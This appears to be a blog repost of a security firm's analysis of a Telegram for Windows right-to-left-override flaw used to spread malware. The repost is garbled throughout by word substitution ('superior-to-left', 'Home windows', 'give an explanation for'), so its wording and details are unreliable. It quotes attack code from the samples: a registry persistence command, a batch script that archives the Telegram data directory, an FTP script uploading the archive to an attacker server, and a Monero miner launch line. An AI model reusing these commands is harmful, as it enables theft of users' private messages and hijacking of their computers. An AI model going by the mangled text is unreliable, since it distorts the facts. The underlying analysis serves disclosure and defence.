Zero-day vulnerability in Telegram
|February 13, 2018||Posted by BLOGGER under HACKER-TECH|
In October 2017, we realized of a vulnerability in Telegram Messenger’s Home windows client that changed into once being exploited within the wild. It entails utilizing a traditional superior-to-left override attack when a person sends data over the messenger carrier.
True-to-left override in a nutshell
The particular nonprinting superior-to-left override (RLO) personality is primitive to reverse the give an explanation for of the characters that near after that personality within the string. In the Unicode personality desk, it is represented as ‘U+202E’; one keep of agreeable use is when typing Arabic text. In an attack, this personality might most certainly well even be primitive to mislead the sufferer. It’s on the full primitive when displaying the title and extension of an executable file: a little bit of instrument inclined to this kind of attack will repeat the filename incompletely or in reverse.
— Mikko Hypponen (@mikko) 15 июля 2013 г.
Launching an attack on Telegram
Below is an legend of how this vulnerability changed into once exploited in Telegram:
- The cybercriminal prepares the malware to be sent in a message. As an instance, a JS file is renamed as follows:
defective.js -> photo_high_re*U+202E*gnp.js
The keep *U+202E* is the RLO personality to develop Telegram repeat the final string gnp.js in reverse. Prove that this operation would now not alternate the correct file – it peaceful has the extension *.js.
- The attacker sends the message, and – shock! – the recipient sees an incoming PNG portray file as a alternative of a JS file:
- When the person clicks on this file, the fashioned Home windows security notification is displayed:
Importantly, this notification is handiest displayed if it hasn’t been disabled within the system’s settings. If the person clicks on ‘Dawdle’, the malicious file is launched.
Exploitation within the wild
After finding out the vulnerability, we started to learn cases where it changed into once in point of reality exploited. These cases drop into a number of fashioned scenarios.
Far off regulate
The blueprint of this kind of attack is to want regulate of the sufferer’s system, and entails the attacker finding out the aim system’s ambiance and the set up of additional modules.
On the major stage, a downloader is disbursed to the aim, which is written in .Rep, and uses Telegram API as the give an explanation for protocol:
With this token and API, it is easy to search out the Telegram bot by capability of which the contaminated programs are managed:
When launched, it modifies startup registry key to manufacture persistence on a system and copies its executable file into one in all the directories, relying on the ambiance:
Then it begins to test every two seconds for instructions getting again from the regulate bot. Prove that the instructions are implemented in Russian:
The list of supported instructions reveals that the bot can silently deploy arbitrary malicious tools take care of backdoors, loggers and other malware on the aim system. A complete list of supported instructions is given under:
|Ship list of data in directory to manipulate bot.|
|Launch executable file utilizing Route of.Open().|
|Take a look at if tor job is running, receive logg.zip, unpack it, delete the archive and starting up its content.|
|Net file into its comprise directory.|
|Delete file from its comprise directory.|
|Unpack archive in its comprise directory utilizing specified password.|
|Terminate specified job utilizing job.Cancel()|
|Connected as ‘Net’ (peep above), with assorted give an explanation for parsing.|
|Connected as ‘Launch’ (peep above), with assorted give an explanation for parsing.|
|Connected as ‘Delete’ (peep above), with assorted give an explanation for parsing.|
|Connected as ‘Unpack’ (peep above), with assorted give an explanation for parsing.|
|Ship a checklist of instructions running on course PC to manipulate bot.|
An analysis of these instructions reveals that this loader will most likely be designed to receive but any other piece of malware, most certainly a logger that will most certainly well stare on the sufferer person.
Miners and extra
Amid the cryptocurrency allege, cybercriminals are increasingly moving away from ‘traditional robbery’ to a brand unusual procedure of making cash from their victims – particularly mining cryptocurrency utilizing the sources of an contaminated computer. All they must fabricate is mosey a mining client on the sufferer computer and specify the information of their cryptocurrency pockets.
On the major stage of the attack, an SFX archive with a script is primitive that launches an executable file:
This mosey.exe file is genuinely a BAT file. The batch script, after extraction, looks take care of this:
As we are in a position to peep, the malicious program first opens a decoy file – on this case it is an portray to lull the sufferer accurate into a false sense of security.
Then, two miners starting up one after the opposite. They’re launched as providers with the abet of the nssm.exe utility, which will most likely be contained within the same SFX archive.
- nheq.exe: an Equihash miner for NiceHash (on this notify case, it mined Zcash). Can use the sources of both the CPU and graphics accelerator:
- taskmgn.exe – but any other smartly-liked miner enforcing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a identified notify string with pdb path:
We comprise seen a number of variations of this batch script, a pair of of which comprise additional components:
This notify version disables Home windows security components, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload changed into once an SFX archive that incorporates but any other miners and a Far off Manipulator Procedure (RMS) client, an analog of TeamViewer. The usage of AutoIt scripts, the malware deploys RMS on the focused computer for subsequent distant access:
The attack flowchart is approximately as follows:
We comprise examined this FTP server and found a number of extra similar payloads, which are most certainly loaded by other variations of this malware.
The file address4.exe is enough of a assorted mention. Love the opposite data, it is an SFX archive with the next contents:
All components named st*.exe are executable PE data transformed in a similar intention from batch scripts.
The SFX script launches the element st1.exe:
st1.exe provides st2.exe to the system startup by writing the correct file to the system registry:
reg add HKEY_CURRENT_USERSOFTWAREMicrosoftHome windowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f
So the st2.exe file launches when system is booted subsequent time:
TIMEOUT /T 10 /NOBREAK #Waits for Telegram to starting up
taskkill /IM telegram.exe #Terminates Telegram processes
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory accurate into a RAR archive
TIMEOUT /T 60 /NOBREAK
ping -n 1 ya.ru |>nul secure /i “TTL=” && (originate “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :originate) #Checks Net connection and launches st3.exe
As anticipated, st3.exe logs on to the malicious FTP server and uploads the RAR archive that changed into once created earlier:
@echo XXXXXXXX>give an explanation for.txt
@echo XXXXXXXX>>give an explanation for.txt
@echo binary>>give an explanation for.txt
@echo mput %temp%sss*.rar>>give an explanation for.txt
@echo stop>>give an explanation for.txt
ftp -s:give an explanation for.txt -i free11.receive.com
del give an explanation for.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H
On that FTP server, we found a number of archives of this kind containing Telegram directories stolen from the victims:
Every dump incorporates, as well to the Telegram client’s executables and utility data, an encrypted local cache containing assorted data primitive in interior most communications: documents, movies and audio data and photos.
Appropriate take care of within the previous scenario, an attack begins with an SFX archive opening and launching a VBScript that it incorporates. Its indispensable job is to starting up a decoy portray to distract the person, after which receive and starting up the payload:
The payload is an SFX archive with the next script:
svchost.vbs is a script controlling the starting up of the miner CryptoNight (csrs.exe). It shows the duty list; if it detects a assignment supervisor (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s job and re-launches it when the duty supervisor is closed.
The script incorporates the correct comments:
The miner itself is launched as follows:
WshShell.Dawdle “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, zero
The pool address is associated with the cryptocurrency Monero.
On the server itself, as well to to the specified payload data, we found similar SFX archives with miners:
It looks that handiest Russian cybercriminals comprise been conscious about this vulnerability, with all of the exploitation cases that we detected taking place in Russia. Also, whereas conducting a detailed learn of these assaults we found a bunch of artifacts that pointed to involvement by Russian cybercriminals.
We don’t comprise proper information about how prolonged and which variations of the Telegram products comprise been littered with the vulnerability. What we fabricate know is that its exploitation in Home windows customers started in March 2017. We told the Telegram builders of the world, and the vulnerability no longer occurs in Telegram’s products.
This paper items handiest those cases that comprise been reported by Kaspersky Lab’s telemetry programs. The fleshy scope and other techniques of exploitation live unknown.